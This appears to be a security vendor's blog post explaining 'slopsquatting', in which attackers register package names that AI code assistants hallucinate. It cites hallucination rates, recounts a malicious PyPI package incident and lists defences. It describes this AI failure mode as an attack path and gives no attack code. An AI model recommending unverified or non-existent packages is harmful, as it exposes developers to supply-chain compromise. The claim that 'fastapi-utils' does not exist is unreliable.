Slopsquatting: The AI-Induced Supply Chain Threat You Shouldn’t Ignore

Share:

Over the past few years, we’ve seen threat actors get more creative in how they exploit the software supply chain. But the latest twist, slopsquatting, adds a new, AI-fueled dimension that most of us didn’t see coming. It’s like typosquatting’s smarter, stealthier cousin, and it’s quietly creeping into developer workflows, especially those that rely heavily on AI code assistants.

What Is Slopsquatting?

Slopsquatting is a new type of supply chain attack that exploits the trust developers place in AI-generated code. Essentially, it works like this: AI tools like ChatGPT, Copilot, or CodeLlama sometimes “hallucinate”, they suggest package names that don’t actually exist. When developers blindly trust and install these hallucinated packages, attackers who’ve pre-registered them can inject malicious code directly into the development environment.

A large-scale analysis of 576,000 code samples revealed something alarming: around 20% of AI-suggested packages didn’t exist. Open-source models were more prone to this (21.7%) compared to commercial models (5.2%). That’s a staggering number when you consider how many developers are using these tools daily.

The Perfect Storm for Exploitation

Languages like Python and JavaScript thrive on massive, centralized package ecosystems (like PyPI or npm). That openness, combined with the growing influence of AI-generated code, makes it easy for attackers to sneak in fake packages.

A study of 16 code-generating models, including GPT-4, GPT-3.5, DeepSeek, and Mistral, showed that roughly 1 in 5 recommended packages were completely made up. That’s not just a fluke; it’s a vulnerability in how modern development is being done.

Slopsquatting in Context: How It Compares to Other Threats

To better understand slopsquatting, let’s look at how it stacks up against similar attacks we’ve seen in the past:

Attack TypeVectorTargetMethodWhy Slopsquatting Is Different
TyposquattingDomains / Package NamesUsers & DevelopersRegisters misspelled names (e.g., expresss instead of express)Manual mistakes are exploited. Relies on human error.
Dependency ConfusionInternal package namesEnterprise dev environmentsUploads fake public packages with names used in private/internal projectsExploits internal naming conflicts. Doesn’t rely on AI.
Newly Registered Domains (NRDs)DomainsUsersSpins up fresh domains for phishing, malware, or C2Targets users, not code. Easy to detect after a short period.
SlopsquattingAI-generated hallucinated package namesDevelopers using AI toolsRegisters non-existent packages hallucinated by AI modelsExploits trust in AI tools. Harder to detect. Not based on typos or private/internal naming.

Slopsquatting vs. Typosquatting: A New Twist on an Old Trick

If you’re familiar with the concept of Newly Registered Domains (NRDs), where attackers register typo’d domains to catch unsuspecting users, then slopsquatting will feel oddly familiar. But instead of targeting end users through URLs, slopsquatting targets developers through AI-generated code suggestions.

The real kicker? These hallucinated suggestions don’t come from bad intentions in the AI model. They happen due to gaps in training data and unpredictable prompt contexts. That makes them really tough to detect ahead of time, both by AI developers and security tools.

A Real Example: ccxt-mexc-futures & Slopsquatting Attack Vector

Let’s talk about a real-world slopsquatting incident that’s been making waves.
A malicious Python package called ccxt-mexc-futures appeared on PyPI. It masqueraded as an extension of ccxt, a legitimate cryptocurrency trading library. Once installed, it tampered with three critical functions: describe, sign, and prepare_request_headers.

The result? It secretly redirected trading activity on the MEXC exchange to a fake server (v3.mexc.workers[.]dev), which then funneled those orders to a rogue platform at greentreeone[.]com. Over 1,000 developers downloaded this fake package before it was taken down.

Worse, these fake modules often open reverse shells upon installation, handing the attacker persistent access. That’s an open door to sensitive data, internal systems, or worse.

how code packages are infected

Real-World Scenario

Imagine this: You’re building a new feature and turn to an AI assistant for help. It recommends importing fastapi-utils. Sounds legit, right? You run pip install fastapi-utils, only to discover too late that no such package exists in the official registry. But a malicious actor noticed this common hallucination and registered the name first. Just like that, you’ve compromised your application

python code fastapi utils import screen

How to Defend Against Slopsquatting

While the threat is new, the defense strategies don’t require a complete overhaul, just a shift in mindset and tooling. Here’s how to protect yourself and your team:

  • Manual Verification: Always verify AI-suggested packages against official sources like PyPI or npm.
  • Dependency Locking: Use dependency managers that lock to known, verified versions.
  • Sandbox Testing: Test AI-generated code in isolated environments before pushing it into production.
  • Tune AI Settings: Lowering the “temperature” setting in AI tools can reduce hallucination by limiting randomness in responses.
  • Team Awareness: Make sure your team understands the risks associated with AI-generated code and knows how to vet packages properly.

Looking Ahead

Slopsquatting is a warning sign: We’re entering a new phase in software development, where the code we use is often written, or at least suggested, by machines. That means security has to shift left, all the way to the IDE where code gets written.
The good news is that the community is catching on. Researchers are pushing for better AI training, smarter dependency vetting tools, and stronger norms around package verification. The combo of good tools (like SBOMs and AI-aware scanners) and good habits (like reviewing code suggestions) will go a long way.

Final Thought

We’ve trusted AI to help us code faster, and in many ways, it delivers. But slopsquatting proves that speed without scrutiny is risky. By staying informed, verifying our tools, and evolving our security posture, we can keep building fast and building safe.

Enjoyed reading this blog? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.